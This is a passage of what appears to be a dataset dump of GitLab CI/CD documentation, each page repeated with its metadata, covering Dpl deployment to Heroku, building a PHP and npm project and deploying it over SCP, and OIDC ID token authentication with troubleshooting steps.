environment: staging ``` In the previous example we use Dpl to deploy `my-app-staging` to Heroku server with API key stored in `HEROKU_STAGING_API_KEY` secure variable. To use different provider take a look at long list of [Supported Providers](https://github.com/travis-ci/dpl#supported-providers). ## Using Dpl with Docker In most cases, you configured [GitLab Runner](https://docs.gitlab.com/runner/) to use your server's shell commands. This means that all commands are run in the context of local user (for example `gitlab_runner` or `gitlab_ci_multi_runner`). It also means that most probably in your Docker container you don't have the Ruby runtime installed. You must install it: ```yaml staging: stage: deploy script: - apt-get update -yq - apt-get install -y ruby-dev - gem install dpl - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY rules: - if: $CI_COMMIT_BRANCH == "main" environment: staging ``` The first line `apt-get update -yq` updates the list of available packages, where second `apt-get install -y ruby-dev` installs the Ruby runtime on system. The previous example is valid for all Debian-compatible systems. ## Usage in staging and production It's pretty common in the development workflow to have staging (development) and production environments Let's consider the following example: we would like to deploy the `main` branch to `staging` and all tags to the `production` environment. The final `.gitlab-ci.yml` for that setup would look like this: ```yaml staging: stage: deploy script: - gem install dpl - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY rules: - if: $CI_COMMIT_BRANCH == "main" environment: staging production: stage: deploy script: - gem install dpl - dpl heroku api --app=my-app-production --api_key=$HEROKU_PRODUCTION_API_KEY rules: - if: $CI_COMMIT_TAG environment: production ``` We created two deploy jobs that are executed on different events: - `staging`: Executed for all commits pushed to the `main` branch - `production`: Executed for all pushed tags We also use two secure variables: - `HEROKU_STAGING_API_KEY`: Heroku API key used to deploy staging app - `HEROKU_PRODUCTION_API_KEY`: Heroku API key used to deploy production app ## Storing API keys To store API keys as secure variables: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. The variables defined in the project settings are sent along with the build script to the runner. The secure variables are stored out of the repository. Never store secrets in your project's `.gitlab-ci.yml` file. It is also important that the secret's value is hidden in the job log. You access added variable by prefixing it's name with `$` (on non-Windows runners) or `%` (for Windows Batch runners): - `$VARIABLE`: Use for non-Windows runners - `%VARIABLE%`: Use for Windows Batch runners Read more about [CI/CD variables](../../variables/_index.md).
https://docs.gitlab.com/ci/examples/composer-npm-deploy
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/examples/composer-npm-deploy.md
2025-08-13
doc/ci/examples/deployment
[ "doc", "ci", "examples", "deployment" ]
composer-npm-deploy.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Running Composer and npm scripts with deployment via SCP in GitLab CI/CD
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This guide covers the building of dependencies of a PHP project while compiling assets via an npm script using [GitLab CI/CD](../../_index.md). While it is possible to create your own image with custom PHP and Node.js versions, for brevity we use an existing [Docker image](https://hub.docker.com/r/tetraweb/php/) that contains both PHP and Node.js installed. ```yaml image: tetraweb/php ``` The next step is to install zip/unzip packages and make composer available. We place these in the `before_script` section: ```yaml before_script: - apt-get update - apt-get install zip unzip - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php composer-setup.php - php -r "unlink('composer-setup.php');" ``` This makes sure we have all requirements ready. Next, run `composer install` to fetch all PHP dependencies and `npm install` to load Node.js packages. Then run the `npm` script. We need to append them into `before_script` section: ```yaml before_script: # ... - php composer.phar install - npm install - npm run deploy ``` In this particular case, the `npm deploy` script is a Gulp script that does the following: 1. Compile CSS & JS 1. Create sprites 1. Copy various assets (images, fonts) around 1. Replace some strings All these operations put all files into a `build` folder, which is ready to be deployed to a live server. ## How to transfer files to a live server You have multiple options such as rsync, SCP, or SFTP. For now, use SCP. To make this work, you must add a GitLab CI/CD Variable (accessible on `gitlab.example/your-project-name/variables`). Name this variable `STAGING_PRIVATE_KEY` and set it to the **private** SSH key of your server. ### Security tip Create a user that has access **only** to the folder that needs to be updated. After you create that variable, make sure that key is added to the Docker container on run: ```yaml before_script: # - .... - 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )' - mkdir -p ~/.ssh - eval $(ssh-agent -s) - '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" > ~/.ssh/config' ``` In order, this means that: 1. We check if the `ssh-agent` is available and we install it if it's not. 1. We create the `~/.ssh` folder. 1. We make sure we're running bash. 1. We disable host checking (we don't ask the user to accept when we first connect to a server and, because every job equals a first connect, we need this). And this is basically all you need in the `before_script` section. ## How to deploy As we stated previously, we need to deploy the `build` folder from the Docker image to our server. To do so, we create a new job: ```yaml stage_deploy: artifacts: paths: - build/ rules: - if: $CI_COMMIT_BRANCH == "dev" script: - ssh-add <(echo "$STAGING_PRIVATE_KEY") - ssh -p22 server_user@server_host "mkdir htdocs/wp-content/themes/_tmp" - scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/_tmp - ssh -p22 server_user@server_host "mv htdocs/wp-content/themes/live htdocs/wp-content/themes/_old && mv htdocs/wp-content/themes/_tmp htdocs/wp-content/themes/live" - ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/_old" ``` Here's the breakdown: 1. `rules:if: $CI_COMMIT_BRANCH == "dev"` means that this build runs only when something is pushed to the `dev` branch. You can remove this block completely and have everything run on every push (but probably this is something you don't want). 1. `ssh-add ...` we add that private key you added on the web UI to the Docker container. 1. We connect via `ssh` and create a new `_tmp` folder. 1. We connect via `scp` and upload the `build` folder (which was generated by a `npm` script) to our previously created `_tmp` folder. 1. We connect again via `ssh` and move the `live` folder to an `_old` folder, then move `_tmp` to `live`. 1. We connect to SSH and remove the `_old` folder. What's the deal with the artifacts? We tell GitLab CI/CD to keep the `build` directory (later on, you can download that as needed). ### Why we do it this way If you're using this only for stage server, you could do this in two steps: ```yaml - ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/live/*" - scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/live ``` The problem is that there's a small period of time when you don't have the app on your server. Therefore, for a production environment we use additional steps to ensure that at any given time, a functional app is in place. ## Where to go next Because this was a WordPress project, it includes real code snippets. Some further ideas you can pursue: - Having a slightly different script for the default branch allows you to deploy to a production server from that branch and to a stage server from any other branches. - Instead of pushing it live, you can push it to WordPress official repository. - You could generate i18n text domains on the fly. --- Our final `.gitlab-ci.yml` looks like this: ```yaml stage_deploy: image: tetraweb/php artifacts: paths: - build/ rules: - if: $CI_COMMIT_BRANCH == "dev" before_script: - apt-get update - apt-get install zip unzip - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php composer-setup.php - php -r "unlink('composer-setup.php');" - php composer.phar install - npm install - npm run deploy - 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )' - mkdir -p ~/.ssh - eval $(ssh-agent -s) - '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" > ~/.ssh/config' script: - ssh-add <(echo "$STAGING_PRIVATE_KEY") - ssh -p22 server_user@server_host "mkdir htdocs/wp-content/themes/_tmp" - scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/_tmp - ssh -p22 server_user@server_host "mv htdocs/wp-content/themes/live htdocs/wp-content/themes/_old && mv htdocs/wp-content/themes/_tmp htdocs/wp-content/themes/live" - ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/_old" ```
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Running Composer and npm scripts with deployment via SCP in GitLab CI/CD breadcrumbs: - doc - ci - examples - deployment --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This guide covers the building of dependencies of a PHP project while compiling assets via an npm script using [GitLab CI/CD](../../_index.md). While it is possible to create your own image with custom PHP and Node.js versions, for brevity we use an existing [Docker image](https://hub.docker.com/r/tetraweb/php/) that contains both PHP and Node.js installed. ```yaml image: tetraweb/php ``` The next step is to install zip/unzip packages and make composer available. We place these in the `before_script` section: ```yaml before_script: - apt-get update - apt-get install zip unzip - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php composer-setup.php - php -r "unlink('composer-setup.php');" ``` This makes sure we have all requirements ready. Next, run `composer install` to fetch all PHP dependencies and `npm install` to load Node.js packages. Then run the `npm` script. We need to append them into `before_script` section: ```yaml before_script: # ... - php composer.phar install - npm install - npm run deploy ``` In this particular case, the `npm deploy` script is a Gulp script that does the following: 1. Compile CSS & JS 1. Create sprites 1. Copy various assets (images, fonts) around 1. Replace some strings All these operations put all files into a `build` folder, which is ready to be deployed to a live server. ## How to transfer files to a live server You have multiple options such as rsync, SCP, or SFTP. For now, use SCP. To make this work, you must add a GitLab CI/CD Variable (accessible on `gitlab.example/your-project-name/variables`). Name this variable `STAGING_PRIVATE_KEY` and set it to the **private** SSH key of your server. ### Security tip Create a user that has access **only** to the folder that needs to be updated. After you create that variable, make sure that key is added to the Docker container on run: ```yaml before_script: # - .... - 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )' - mkdir -p ~/.ssh - eval $(ssh-agent -s) - '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" > ~/.ssh/config' ``` In order, this means that: 1. We check if the `ssh-agent` is available and we install it if it's not. 1. We create the `~/.ssh` folder. 1. We make sure we're running bash. 1. We disable host checking (we don't ask the user to accept when we first connect to a server and, because every job equals a first connect, we need this). And this is basically all you need in the `before_script` section. ## How to deploy As we stated previously, we need to deploy the `build` folder from the Docker image to our server. To do so, we create a new job: ```yaml stage_deploy: artifacts: paths: - build/ rules: - if: $CI_COMMIT_BRANCH == "dev" script: - ssh-add <(echo "$STAGING_PRIVATE_KEY") - ssh -p22 server_user@server_host "mkdir htdocs/wp-content/themes/_tmp" - scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/_tmp - ssh -p22 server_user@server_host "mv htdocs/wp-content/themes/live htdocs/wp-content/themes/_old && mv htdocs/wp-content/themes/_tmp htdocs/wp-content/themes/live" - ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/_old" ``` Here's the breakdown: 1. `rules:if: $CI_COMMIT_BRANCH == "dev"` means that this build runs only when something is pushed to the `dev` branch. You can remove this block completely and have everything run on every push (but probably this is something you don't want). 1. `ssh-add ...` we add that private key you added on the web UI to the Docker container. 1. We connect via `ssh` and create a new `_tmp` folder. 1. We connect via `scp` and upload the `build` folder (which was generated by a `npm` script) to our previously created `_tmp` folder. 1. We connect again via `ssh` and move the `live` folder to an `_old` folder, then move `_tmp` to `live`. 1. We connect to SSH and remove the `_old` folder. What's the deal with the artifacts? We tell GitLab CI/CD to keep the `build` directory (later on, you can download that as needed). ### Why we do it this way If you're using this only for stage server, you could do this in two steps: ```yaml - ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/live/*" - scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/live ``` The problem is that there's a small period of time when you don't have the app on your server. Therefore, for a production environment we use additional steps to ensure that at any given time, a functional app is in place. ## Where to go next Because this was a WordPress project, it includes real code snippets. Some further ideas you can pursue: - Having a slightly different script for the default branch allows you to deploy to a production server from that branch and to a stage server from any other branches. - Instead of pushing it live, you can push it to WordPress official repository. - You could generate i18n text domains on the fly. --- Our final `.gitlab-ci.yml` looks like this: ```yaml stage_deploy: image: tetraweb/php artifacts: paths: - build/ rules: - if: $CI_COMMIT_BRANCH == "dev" before_script: - apt-get update - apt-get install zip unzip - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php composer-setup.php - php -r "unlink('composer-setup.php');" - php composer.phar install - npm install - npm run deploy - 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )' - mkdir -p ~/.ssh - eval $(ssh-agent -s) - '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" > ~/.ssh/config' script: - ssh-add <(echo "$STAGING_PRIVATE_KEY") - ssh -p22 server_user@server_host "mkdir htdocs/wp-content/themes/_tmp" - scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/_tmp - ssh -p22 server_user@server_host "mv htdocs/wp-content/themes/live htdocs/wp-content/themes/_old && mv htdocs/wp-content/themes/_tmp htdocs/wp-content/themes/live" - ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/_old" ```
https://docs.gitlab.com/ci/id_token_authentication
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/id_token_authentication.md
2025-08-13
doc/ci/secrets
[ "doc", "ci", "secrets" ]
id_token_authentication.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
OpenID Connect (OIDC) Authentication Using ID Tokens
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/356986) in GitLab 15.7. {{< /history >}} You can authenticate with third party services using GitLab CI/CD's [ID tokens](../yaml/_index.md#id_tokens). ## ID Tokens [ID tokens](../yaml/_index.md#id_tokens) are JSON Web Tokens (JWTs) that can be added to a GitLab CI/CD job. They can be used for OIDC authentication with third-party services, and are used by the [`secrets`](../yaml/_index.md#secrets) keyword to authenticate with HashiCorp Vault. ID tokens are configured in the `.gitlab-ci.yml`. For example: ```yaml job_with_id_tokens: id_tokens: FIRST_ID_TOKEN: aud: https://first.service.com SECOND_ID_TOKEN: aud: https://second.service.com script: - first-service-authentication-script.sh $FIRST_ID_TOKEN - second-service-authentication-script.sh $SECOND_ID_TOKEN ``` In this example, the two tokens have different `aud` claims. Third party services can be configured to reject tokens that do not have an `aud` claim matching their bound audience. Use this functionality to reduce the number of services with which a token can authenticate. This reduces the severity of having a token compromised. ### Token payload The following standard claims are included in each ID token: | Field | Description | |--------------------------------------------------------------------|-------------| | [`iss`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.1) | Issuer of the token, which is the domain of the GitLab instance ("issuer" claim). | | [`sub`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.2) | Subject of the token ("subject" claim). Defaults to `project_path:{group}/{project}:ref_type:{type}:ref:{branch_name}`. Can be configured for the project with the [projects API](../../api/projects.md#edit-a-project). | | [`aud`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.3) | Intended audience for the token ("audience" claim). Specified in the [ID tokens](../yaml/_index.md#id_tokens) configuration. The domain of the GitLab instance by default. | | [`exp`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.4) | The expiration time ("expiration time" claim). | | [`nbf`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.5) | The time after which the token becomes valid ("not before" claim). | | [`iat`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.6) | The time the JWT was issued ("issued at" claim). | | [`jti`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.7) | Unique identifier for the token ("JWT ID" claim). | The token also includes custom claims provided by GitLab: | Field | When | Description | |-------------------------|--------------------------------------------|-------------| | `namespace_id` | Always | Use this to scope to group or user level namespace by ID. | | `namespace_path` | Always | Use this to scope to group or user level namespace by path. | | `project_id` | Always | Use this to scope to project by ID. | | `project_path` | Always | Use this to scope to project by path. | | `user_id` | Always | ID of the user executing the job. | | `user_login` | Always | Username of the user executing the job. | | `user_email` | Always | Email of the user executing the job. | | `user_access_level` | Always | Access level of the user executing the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/432052) in GitLab 16.9. | | `user_identities` | User Preference setting | List of the user's external identities ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/387537) in GitLab 16.0). | | `pipeline_id` | Always | ID of the pipeline. | | `pipeline_source` | Always | [Pipeline source](../jobs/job_rules.md#common-if-clauses-with-predefined-variables). | | `job_id` | Always | ID of the job. | | `ref` | Always | Git ref for the job. | | `ref_type` | Always | Git ref type, either `branch` or `tag`. | | `ref_path` | Always | Fully qualified ref for the job. For example, `refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/119075) in GitLab 16.0. | | `ref_protected` | Always | `true` if the Git ref is protected, `false` otherwise. | | `groups_direct` | User is a direct member of 0 to 200 groups | The paths of the user's direct membership groups. Omitted if the user is a direct member of more than 200 groups. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/435848) in GitLab 16.11 and put behind the `ci_jwt_groups_direct` [feature flag](../../administration/feature_flags/_index.md) in GitLab 17.3. | | `environment` | Job specifies an environment | Environment this job deploys to. | | `environment_protected` | Job specifies an environment | `true` if deployed environment is protected, `false` otherwise. | | `deployment_tier` | Job specifies an environment | [Deployment tier](../environments/_index.md#deployment-tier-of-environments) of the environment the job specifies. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/363590) in GitLab 15.2. | | `environment_action` | Job specifies an environment | [Environment action (`environment:action`)](../environments/_index.md) specified in the job. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/) in GitLab 16.5) | | `runner_id` | Always | ID of the runner executing the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. | | `runner_environment` | Always | The type of runner used by the job. Can be either `gitlab-hosted` or `self-hosted`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. | | `sha` | Always | The commit SHA for the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. | | `ci_config_ref_uri` | Always | The ref path to the top-level pipeline definition, for example, `gitlab.example.com/my-group/my-project//.gitlab-ci.yml@refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.2. This claim is `null` unless the pipeline definition is located in the same project. | | `ci_config_sha` | Always | Git commit SHA for the `ci_config_ref_uri`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.2. This claim is `null` unless the pipeline definition is located in the same project. | | `project_visibility` | Always | The [visibility](../../user/public_access.md) of the project where the pipeline is running. Can be `internal`, `private`, or `public`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/418810) in GitLab 16.3. | ```json { "namespace_id": "72", "namespace_path": "my-group", "project_id": "20", "project_path": "my-group/my-project", "user_id": "1", "user_login": "sample-user", "user_email": "sample-user@example.com", "user_identities": [ {"provider": "github", "extern_uid": "2435223452345"}, {"provider": "bitbucket", "extern_uid": "john.smith"} ], "pipeline_id": "574", "pipeline_source": "push", "job_id": "302", "ref": "feature-branch-1", "ref_type": "branch", "ref_path": "refs/heads/feature-branch-1", "ref_protected": "false", "groups_direct": ["mygroup/mysubgroup", "myothergroup/myothersubgroup"], "environment": "test-environment2", "environment_protected": "false", "deployment_tier": "testing", "environment_action": "start", "runner_id": 1, "runner_environment": "self-hosted", "sha": "714a629c0b401fdce83e847fc9589983fc6f46bc", "project_visibility": "public", "ci_config_ref_uri": "gitlab.example.com/my-group/my-project//.gitlab-ci.yml@refs/heads/main", "ci_config_sha": "714a629c0b401fdce83e847fc9589983fc6f46bc", "jti": "235b3a54-b797-45c7-ae9a-f72d7bc6ef5b", "iss": "https://gitlab.example.com", "iat": 1681395193, "nbf": 1681395188, "exp": 1681398793, "sub": "project_path:my-group/my-project:ref_type:branch:ref:feature-branch-1", "aud": "https://vault.example.com" } ``` The ID token is encoded by using RS256 and signed with a dedicated private key. The expiry time for the token is set to the job's timeout if specified, or 5 minutes if no timeout is specified. ## ID Token authentication with third party services You can use ID tokens for OIDC authentication with a third party service. For example: - [HashiCorp Vault](hashicorp_vault.md) - [Google Cloud Secret Manager](gcp_secret_manager.md#configure-gitlab-cicd-to-use-gcp-secret-manager-secrets) - [Azure Key Vault](azure_key_vault.md#use-azure-key-vault-secrets-in-a-cicd-job) ## Troubleshooting ### `400: missing token` status code This error indicates that one or more basic components necessary for ID tokens are either missing or not configured as expected. To find the problem, an administrator can look for more details in the instance's `exceptions_json.log` for the specific method that failed. ### `GitLab::Ci::Jwt::NoSigningKeyError` This error in the `exceptions_json.log` file is likely because the signing key is missing from the database and the token could not be generated. To verify this is the issue, run the following query on the instance's PostgreSQL terminal: ```sql SELECT encrypted_ci_jwt_signing_key FROM application_settings; ``` If the returned value is empty, use the following Rails snippet to generate a new key and replace it internally: ```ruby key = OpenSSL::PKey::RSA.new(2048).to_pem ApplicationSetting.find_each do |application_setting| application_setting.update(ci_jwt_signing_key: key) end ``` ### `401: unauthorized` status code This error indicates that the authentication request failed. When using OpenID Connect (OIDC) authentication from GitLab pipelines to external services, `401 Unauthorized` errors can occur due to several common reasons: - You used a deprecated token, such as `$CI_JOB_JWT_V2`, instead of [declaring an ID token](../yaml/_index.md#id_tokens). For more information, see [old versions of JSON Web Tokens are deprecated](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated). - You mismatched `provider_name` values between your `.gitlab-ci.yml` file and the OIDC Identity Provider configuration on the external service. - You missed or mismatched the `aud` (audience) claim between the ID token issued by GitLab and what the external service expects. - You did not enable or configure the `id_tokens:` block in the GitLab CI/CD job. To resolve the error, decode the token inside your job: ```shell echo $OIDC_TOKEN | cut -d '.' -f2 | base64 -d | jq . ``` Make sure that: - `aud` (audience) matches the expected audience (for example, the external service's URL). - `sub` (subject) is mapped in the service's Identity Provider settings. - `preferred_username` is not present by default in GitLab ID tokens.
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: OpenID Connect (OIDC) Authentication Using ID Tokens breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/356986) in GitLab 15.7. {{< /history >}} You can authenticate with third party services using GitLab CI/CD's [ID tokens](../yaml/_index.md#id_tokens). ## ID Tokens [ID tokens](../yaml/_index.md#id_tokens) are JSON Web Tokens (JWTs) that can be added to a GitLab CI/CD job. They can be used for OIDC authentication with third-party services, and are used by the [`secrets`](../yaml/_index.md#secrets) keyword to authenticate with HashiCorp Vault. ID tokens are configured in the `.gitlab-ci.yml`. For example: ```yaml job_with_id_tokens: id_tokens: FIRST_ID_TOKEN: aud: https://first.service.com SECOND_ID_TOKEN: aud: https://second.service.com script: - first-service-authentication-script.sh $FIRST_ID_TOKEN - second-service-authentication-script.sh $SECOND_ID_TOKEN ``` In this example, the two tokens have different `aud` claims. Third party services can be configured to reject tokens that do not have an `aud` claim matching their bound audience. Use this functionality to reduce the number of services with which a token can authenticate. This reduces the severity of having a token compromised. ### Token payload The following standard claims are included in each ID token: | Field | Description | |--------------------------------------------------------------------|-------------| | [`iss`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.1) | Issuer of the token, which is the domain of the GitLab instance ("issuer" claim). | | [`sub`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.2) | Subject of the token ("subject" claim). Defaults to `project_path:{group}/{project}:ref_type:{type}:ref:{branch_name}`. Can be configured for the project with the [projects API](../../api/projects.md#edit-a-project). | | [`aud`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.3) | Intended audience for the token ("audience" claim). Specified in the [ID tokens](../yaml/_index.md#id_tokens) configuration. The domain of the GitLab instance by default. | | [`exp`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.4) | The expiration time ("expiration time" claim). | | [`nbf`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.5) | The time after which the token becomes valid ("not before" claim). | | [`iat`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.6) | The time the JWT was issued ("issued at" claim). | | [`jti`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.7) | Unique identifier for the token ("JWT ID" claim). | The token also includes custom claims provided by GitLab: | Field | When | Description | |-------------------------|--------------------------------------------|-------------| | `namespace_id` | Always | Use this to scope to group or user level namespace by ID. | | `namespace_path` | Always | Use this to scope to group or user level namespace by path. | | `project_id` | Always | Use this to scope to project by ID. | | `project_path` | Always | Use this to scope to project by path. | | `user_id` | Always | ID of the user executing the job. | | `user_login` | Always | Username of the user executing the job. | | `user_email` | Always | Email of the user executing the job. | | `user_access_level` | Always | Access level of the user executing the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/432052) in GitLab 16.9. | | `user_identities` | User Preference setting | List of the user's external identities ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/387537) in GitLab 16.0). | | `pipeline_id` | Always | ID of the pipeline. | | `pipeline_source` | Always | [Pipeline source](../jobs/job_rules.md#common-if-clauses-with-predefined-variables). | | `job_id` | Always | ID of the job. | | `ref` | Always | Git ref for the job. | | `ref_type` | Always | Git ref type, either `branch` or `tag`. | | `ref_path` | Always | Fully qualified ref for the job. For example, `refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/119075) in GitLab 16.0. | | `ref_protected` | Always | `true` if the Git ref is protected, `false` otherwise. | | `groups_direct` | User is a direct member of 0 to 200 groups | The paths of the user's direct membership groups. Omitted if the user is a direct member of more than 200 groups. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/435848) in GitLab 16.11 and put behind the `ci_jwt_groups_direct` [feature flag](../../administration/feature_flags/_index.md) in GitLab 17.3. | | `environment` | Job specifies an environment | Environment this job deploys to. | | `environment_protected` | Job specifies an environment | `true` if deployed environment is protected, `false` otherwise. | | `deployment_tier` | Job specifies an environment | [Deployment tier](../environments/_index.md#deployment-tier-of-environments) of the environment the job specifies. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/363590) in GitLab 15.2. | | `environment_action` | Job specifies an environment | [Environment action (`environment:action`)](../environments/_index.md) specified in the job. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/) in GitLab 16.5) | | `runner_id` | Always | ID of the runner executing the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. | | `runner_environment` | Always | The type of runner used by the job. Can be either `gitlab-hosted` or `self-hosted`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. | | `sha` | Always | The commit SHA for the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. | | `ci_config_ref_uri` | Always | The ref path to the top-level pipeline definition, for example, `gitlab.example.com/my-group/my-project//.gitlab-ci.yml@refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.2. This claim is `null` unless the pipeline definition is located in the same project. | | `ci_config_sha` | Always | Git commit SHA for the `ci_config_ref_uri`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.2. This claim is `null` unless the pipeline definition is located in the same project. | | `project_visibility` | Always | The [visibility](../../user/public_access.md) of the project where the pipeline is running. Can be `internal`, `private`, or `public`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/418810) in GitLab 16.3. | ```json { "namespace_id": "72", "namespace_path": "my-group", "project_id": "20", "project_path": "my-group/my-project", "user_id": "1", "user_login": "sample-user", "user_email": "sample-user@example.com", "user_identities": [ {"provider": "github", "extern_uid": "2435223452345"}, {"provider": "bitbucket", "extern_uid": "john.smith"} ], "pipeline_id": "574", "pipeline_source": "push", "job_id": "302", "ref": "feature-branch-1", "ref_type": "branch", "ref_path": "refs/heads/feature-branch-1", "ref_protected": "false", "groups_direct": ["mygroup/mysubgroup", "myothergroup/myothersubgroup"], "environment": "test-environment2", "environment_protected": "false", "deployment_tier": "testing", "environment_action": "start", "runner_id": 1, "runner_environment": "self-hosted", "sha": "714a629c0b401fdce83e847fc9589983fc6f46bc", "project_visibility": "public", "ci_config_ref_uri": "gitlab.example.com/my-group/my-project//.gitlab-ci.yml@refs/heads/main", "ci_config_sha": "714a629c0b401fdce83e847fc9589983fc6f46bc", "jti": "235b3a54-b797-45c7-ae9a-f72d7bc6ef5b", "iss": "https://gitlab.example.com", "iat": 1681395193, "nbf": 1681395188, "exp": 1681398793, "sub": "project_path:my-group/my-project:ref_type:branch:ref:feature-branch-1", "aud": "https://vault.example.com" } ``` The ID token is encoded by using RS256 and signed with a dedicated private key. The expiry time for the token is set to the job's timeout if specified, or 5 minutes if no timeout is specified. ## ID Token authentication with third party services You can use ID tokens for OIDC authentication with a third party service. For example: - [HashiCorp Vault](hashicorp_vault.md) - [Google Cloud Secret Manager](gcp_secret_manager.md#configure-gitlab-cicd-to-use-gcp-secret-manager-secrets) - [Azure Key Vault](azure_key_vault.md#use-azure-key-vault-secrets-in-a-cicd-job) ## Troubleshooting ### `400: missing token` status code This error indicates that one or more basic components necessary for ID tokens are either missing or not configured as expected. To find the problem, an administrator can look for more details in the instance's `exceptions_json.log` for the specific method that failed. ### `GitLab::Ci::Jwt::NoSigningKeyError` This error in the `exceptions_json.log` file is likely because the signing key is missing from the database and the token could not be generated. To verify this is the issue, run the following query on the instance's PostgreSQL terminal: ```sql SELECT encrypted_ci_jwt_signing_key FROM application_settings; ``` If the returned value is empty, use the following Rails snippet to generate a new key and replace it internally: ```ruby key = OpenSSL::PKey::RSA.new(2048).to_pem ApplicationSetting.find_each do |application_setting| application_setting.update(ci_jwt_signing_key: key) end ``` ### `401: unauthorized` status code This error indicates that the authentication request failed. When using OpenID Connect (OIDC) authentication from GitLab pipelines to external services, `401 Unauthorized` errors can occur due to several common reasons: - You used a deprecated token, such as `$CI_JOB_JWT_V2`, instead of [declaring an ID token](../yaml/_index.md#id_tokens). For more information, see [old versions of JSON Web Tokens are 